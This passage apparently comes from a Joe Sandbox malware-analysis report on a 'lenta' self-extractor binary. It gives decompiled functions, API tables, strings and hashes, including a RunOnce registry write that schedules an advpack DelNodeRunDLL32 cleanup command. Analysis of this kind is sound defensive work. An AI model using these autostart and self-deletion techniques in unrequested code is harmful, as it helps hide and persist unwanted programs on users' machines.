						if(E0007681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E000767C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00076CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x000744b9
0x000744c4
0x000744cb
0x000744d8
0x000744e4
0x000744eb
0x000744ee
0x000744ef
0x000744ef
0x000744f1
0x000744f7
0x000744f8
0x0007467b
0x000744fe
0x00074509
0x00074518
0x00074525
0x00074562
0x00074568
0x00074568
0x0007456b
0x0007456b
0x0007456d
0x0007456e
0x00074572
0x00074578
0x0007457c
0x000745cb
0x00074607
0x00074607
0x0007460d
0x00074613
0x00074617
0x00000000
0x0007461d
0x00074623
0x00074626
0x00074628
0x00000000
0x00074628
0x000745cd
0x000745cd
0x000745cf
0x000745cf
0x000745d2
0x000745d2
0x000745d4
0x000745d5
0x000745db
0x000745de
0x000745e3
0x000745e9
0x000745ed
0x00000000
0x000745f3
0x000745fd
0x00000000
0x00074602
0x000745ed
0x0007457e
0x0007457e
0x00074580
0x00074580
0x00074583
0x00074583
0x00074585
0x00074586
0x0007458a
0x0007458c
0x0007458f
0x0007458f
0x00074591
0x00074592
0x0007459b
0x0007459e
0x000745a3
0x000745a9
0x000745ad
0x00000000
0x000745af
0x000745af
0x000745bf
0x0007462d
0x00074630
0x0007463d
0x0007464e
0x0007464e
0x0007463f
0x00074640
0x00074647
0x0007464c
0x00000000
0x00000000
0x0007464c
0x00074666
0x0007466d
0x0007466f
0x00074675
0x00074675
0x000745ad
0x00074527
0x0007452e
0x0007453f
0x0007453f
0x00074530
0x00074531
0x00074538
0x0007453d
0x00000000
0x00000000
0x0007453d
0x00074554
0x0007455a
0x0007455a
0x0007455a
0x00074525
0x0007468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554
LocalAlloc.KERNEL32(00000040,00000065), ref: 000745A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 000745E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0007460D
MessageBeep.USER32(00000000), ref: 00074630
MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00074666
LocalFree.KERNEL32(00000000), ref: 0007466F

Part of subcall function 0007681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0007686E
Part of subcall function 0007681F: GetSystemMetrics.USER32(0000004A), ref: 000768A7
Part of subcall function 0007681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000768CC
Part of subcall function 0007681F: RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,?,0000000C), ref: 000768F4
Part of subcall function 0007681F: RegCloseKey.ADVAPI32(?), ref: 00076902

Strings

LoadString() Error. Could not load string resource., xrefs: 000744E4
lenta, xrefs: 00074545, 0007465A

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lenta
API String ID: 3244514340-1000497449
Opcode ID: fe8898066a09108acdc6c7cd6d4226a2d231820196ff805eb2517821cda58e18
Instruction ID: 860ddc5bb2431087a1fb4d6dbc56b506e8b6a06e870e04207bc413d3e3049dc5
Opcode Fuzzy Hash: fe8898066a09108acdc6c7cd6d4226a2d231820196ff805eb2517821cda58e18
Instruction Fuzzy Hash: 4B51E771E005196BEB219F28CC48BEA7BA9EF86300F148194FD0DB7242DB3D9D45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00072773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00072773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x78004; // 0xdaa0d862
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00071781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0007658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0007658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x71140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00071680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00076CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00072773
0x0007277e
0x00072785
0x0007278a
0x0007278d
0x00072790
0x00072792
0x00072798
0x0007279d
0x000728b2
0x00000000
0x000727a3
0x000727a3
0x000727af
0x000727c2
0x000727c8
0x000727cd
0x000727d5
0x000728b7
0x000728b9
0x00000000
0x000727db
0x000727dd
0x000728aa
0x00000000
0x000727e3
0x000727e3
0x000727ec
0x000727f8
0x00072803
0x0007280b
0x00072831
0x000728c3
0x000728c9
0x000728cd
0x00072837
0x0007285a
0x0007285c
0x00072865
0x00072892
0x00072895
0x00000000
0x00000000
0x00072867
0x00072878
0x0007288c
0x00000000
0x0007287a
0x00072880
0x00072885
0x00072897
0x00072899
0x00072899
0x00072878
0x00072865
0x000728a0
0x000728bf
0x000728c1
0x00000000
0x00000000
0x000728c1
0x00072831
0x000727dd
0x000727d5
0x000728e5

APIs

CharUpperA.USER32(DAA0D862,00000000,00000000,00000000), ref: 000727A8
CharNextA.USER32(0000054D), ref: 000727B5
CharNextA.USER32(00000000), ref: 000727BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072829
RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000728A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000728AA
GetSystemDirectoryA.KERNEL32 ref: 000728B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000727E4

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 81a1cc4f7426cefd05a87f31670e4647233ffff54fccaf5d3c281b33c7c927db
Instruction ID: c44062967b9ee685345b3997ac08eb0bfb0b79540a14573451a7276f64eae766
Opcode Fuzzy Hash: 81a1cc4f7426cefd05a87f31670e4647233ffff54fccaf5d3c281b33c7c927db
Instruction Fuzzy Hash: 8241B270E00128ABEB649B649C85AFE77BCEB55700F0084A9F54DE2141CB7D9EC58FA6

Uniqueness

Uniqueness Score: -1.00%

Function 00072267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00072267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x78004; // 0xdaa0d862
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x78530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0007658A( &_v268, 0x104, 0x71140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
							E0007171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00076CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00072272
0x00072277
0x00072279
0x00072283
0x00072289
0x000722ab
0x000722b1
0x000722c4
0x000722e0
0x000722e6
0x000722f5
0x0007230d
0x0007231c
0x0007231c
0x00072321
0x0007233a
0x00072342
0x00072348
0x0007234b
0x0007234c
0x0007234c
0x0007234e
0x0007234f
0x0007236e
0x0007236e
0x0007237a
0x00072380
0x00072380
0x00072381
0x00072381
0x0007238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000722A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 000722D8
memset.MSVCRT ref: 000722F5
GetSystemDirectoryA.KERNEL32 ref: 00072305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0007236E
RegCloseKey.ADVAPI32(?), ref: 0007237A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00072321
wextract_cleanup0, xrefs: 0007227C, 000722CD, 00072363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00072299
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0007232D

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-2874043782
Opcode ID: d69d1f8138aea6c22a30ce9f06ac3db389141249772c0d33e848e40670e703ce
Instruction ID: c263c8e893a3c2e83bf4fd0a1aaf27ba71d3bfd10897622518c386a977a05c3e
Opcode Fuzzy Hash: d69d1f8138aea6c22a30ce9f06ac3db389141249772c0d33e848e40670e703ce
Instruction Fuzzy Hash: AF31C871E002186BDB619B50DC49FEA777CEB55740F0041A9B50DAA051DA7D6B88CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00073100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00073100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x78590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x78590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E000743D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x78d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x788b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E000730C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00073108
0x0007310b
0x000731b7
0x000731ca
0x000731d0
0x000731d0
0x000731da
0x00000000
0x000731da
0x00073111
0x00073114
0x00073136
0x00073136
0x00073138
0x0007313b
0x00073141
0x00000000
0x00073143
0x00073116
0x0007311b
0x0007314b
0x00073151
0x00073158
0x0007316a
0x00073176
0x0007317d
0x0007318b
0x0007319e
0x000731a3
0x00000000
0x000731ad
0x00073120
0x00000000
0x00000000
0x0007312a
0x00073134
0x00000000
0x00000000
0x00000000
0x00073134
0x0007312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0007313B
GetDesktopWindow.USER32 ref: 0007314B
SetDlgItemTextA.USER32(?,00000834), ref: 0007316A
SetWindowTextA.USER32(?,lenta), ref: 00073176
SetForegroundWindow.USER32(?), ref: 0007317D
GetDlgItem.USER32(?,00000834), ref: 00073185
GetWindowLongA.USER32(00000000,000000FC), ref: 00073190
SetWindowLongA.USER32(00000000,000000FC,000730C0), ref: 000731A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000731CA

Strings

lenta, xrefs: 00073170

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lenta
API String ID: 3785188418-2780258678
Opcode ID: 803bf4e85ad469356089aa388c7657a1f71d735b508670b3533c97038f774ae7
Instruction ID: de2ae8add16dcc08c7a47eae69d153ca9e8559e54806cc6c6135159fc7eb91d9
Opcode Fuzzy Hash: 803bf4e85ad469356089aa388c7657a1f71d735b508670b3533c97038f774ae7
Instruction Fuzzy Hash: D811D231F44211BBFB205B249C0CB9E3BA4EB87721F508210F81DA51E0DB7C9681E79A

Uniqueness

Uniqueness Score: -1.00%

Function 0007468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0007468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00074699
0x0007469b
0x000746a9
0x000746af
0x000746b4
0x000746bc
0x000746f9
0x00000000
0x000746f9
0x000746d9
0x000746dd
0x00000000
0x00000000
0x000746e5
0x000746ef
0x00000000
0x000746f5
0x000746ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
memcpy_s.MSVCRT ref: 000746E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

Strings

lenta, xrefs: 000746E4
TITLE, xrefs: 0007469D, 000746C0

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lenta
API String ID: 3370778649-2035842925
Opcode ID: 7f99a511da66443565fa83fd59966c6053c00afcc6d5ebc7dc32d57e5fb8fe79
Instruction ID: e2bcd45bdc7c60d15fead63170a4f0ba327e8a1f4629ba3c8e1f88705acbed35
Opcode Fuzzy Hash: 7f99a511da66443565fa83fd59966c6053c00afcc6d5ebc7dc32d57e5fb8fe79
Instruction Fuzzy Hash: A901D632B442007BF32027A56C0CF6F3E6CEBC7B62F044414FA4DA6180CA6D888582B7

Uniqueness

Uniqueness Score: -1.00%

Function 000717EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E000717EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x78004; // 0xdaa0d862
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x7a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00076CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x000717f6
0x000717fd
0x00071805
0x0007180b
0x0007180d
0x00071815
0x00071818
0x00071820
0x00071824
0x0007182c
0x00071832
0x00071837
0x00071851
0x00071854
0x0007185d
0x00071862
0x0007186c
0x00071872
0x00071877
0x0007187e
0x0007187e
0x00071883
0x00071883
0x0007185d
0x0007188a
0x0007188a
0x000718a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000718DD), ref: 0007181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0007182C
AllocateAndInitializeSid.ADVAPI32(000718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000718DD), ref: 00071855
FreeSid.ADVAPI32(?,?,?,?,000718DD), ref: 00071883
FreeLibrary.KERNEL32(00000000,?,?,?,000718DD), ref: 0007188A

Strings

advapi32.dll, xrefs: 00071810
CheckTokenMembership, xrefs: 00071826

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: d8058fb64addb9f150d5c5f600f36c3451dae1645ce2df1944bea0d03dcc0b34
Instruction ID: 089c2e24eace0b8b682eab3ce03f801251de954e8db341490d83e8ee7e299816
Opcode Fuzzy Hash: d8058fb64addb9f150d5c5f600f36c3451dae1645ce2df1944bea0d03dcc0b34
Instruction Fuzzy Hash: 5A119A31F00209ABEB509FA4DC49ABEB7B8EF85701F104569F919F6290DA399D4087D5

Uniqueness

Uniqueness Score: -1.00%

Function 00073450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00073450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E000743D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x79404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x791dc = 1;
					goto L8;
				}
				return 0;
			}

0x00073459
0x0007345c
0x000734d8
0x000734de
0x00000000
0x000734e0
0x0007345e
0x00073463
0x0007349a
0x000734a0
0x000734a7
0x000734b2
0x000734c4
0x000734cb
0x00000000
0x000734cb
0x00073468
0x0007346e
0x00073474
0x00000000
0x00000000
0x0007347c
0x0007348c
0x00073490
0x00000000
0x00073496
0x00073484
0x00000000
0x00000000
0x00073486
0x00000000
0x00073486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00073490
GetDesktopWindow.USER32 ref: 0007349A
SetWindowTextA.USER32(?,lenta), ref: 000734B2
SetDlgItemTextA.USER32(?,00000838), ref: 000734C4
SetForegroundWindow.USER32(?), ref: 000734CB
EndDialog.USER32(?,00000002), ref: 000734D8

Strings

lenta, xrefs: 000734AC

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lenta
API String ID: 852535152-2780258678
Opcode ID: ead68368ef5033c73833274b0b7beb8adef2b7b10e20f53f8c631c56f1422cca
Instruction ID: 21fa9cf691cec3486d929fc2e8fe20cae8ca1052e25ac67d7aa11dee4c2215a5
Opcode Fuzzy Hash: ead68368ef5033c73833274b0b7beb8adef2b7b10e20f53f8c631c56f1422cca
Instruction Fuzzy Hash: 53019231F50114ABF72E5F68DC0C96D3B64EB46701F50C010FA4EA65A0C73DAB91EB89

Uniqueness

Uniqueness Score: -1.00%

Function 00072AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00072AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x78004; // 0xdaa0d862
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x79a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00071680(_t65, E000717C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E000765E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00071680(_t65, E000717C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00076CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00072aac
0x00072ab7
0x00072abc
0x00072abe
0x00072ac3
0x00072ac6
0x00072ac9
0x00072ace
0x00072ae6
0x00072bdc
0x00072bdc
0x00072be0
0x00000000
